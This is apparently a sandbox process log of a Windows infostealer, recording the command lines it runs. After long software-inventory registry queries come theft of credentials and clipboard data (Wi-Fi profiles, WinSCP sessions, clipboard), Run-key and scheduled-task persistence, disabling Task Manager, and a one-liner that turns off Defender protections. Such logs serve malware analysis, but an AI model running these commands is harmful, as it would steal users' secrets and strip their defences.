C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\rjPePv20tUXH_tezmp.ps1""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\rjPePv20tUXH_tezmp.ps1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "mullvad account get"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace "root\\SecurityCenter2" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { "262144" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "262160" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "266240" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "266256" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "393216" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "393232" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "393488" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "397312" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "397328" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "397584" { $defstatus = "Out of date"; $rtstatus = "Enabled" } default { $defstatus = "Unknown"; $rtstatus = "Unknown" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct ""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "function Get-AntiVirusProduct {

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupqfB3Eu /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupqfB3Eu /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\" /F /rl highest"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupqfB3Eu /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe /f

C:\Windows\system32\cmd.exe

cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupqfB3Eu /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\" /F /rl highest

C:\Windows\system32\schtasks.exe

schtasks /create /sc onlogon /tn WindowsDriverSetupqfB3Eu /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\" /F /rl highest

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\"""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\""

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\feather.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask ""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\J8MYoXP5tVFg.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\cscript.exe

cscript C:\Users\Admin\AppData\Roaming\J8MYoXP5tVFg.vbs

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut3zQO7.ps1" -RunAsAdministrator"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut3zQO7.ps1" -RunAsAdministrator

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe""

C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe

"C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x508 0x51c

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe
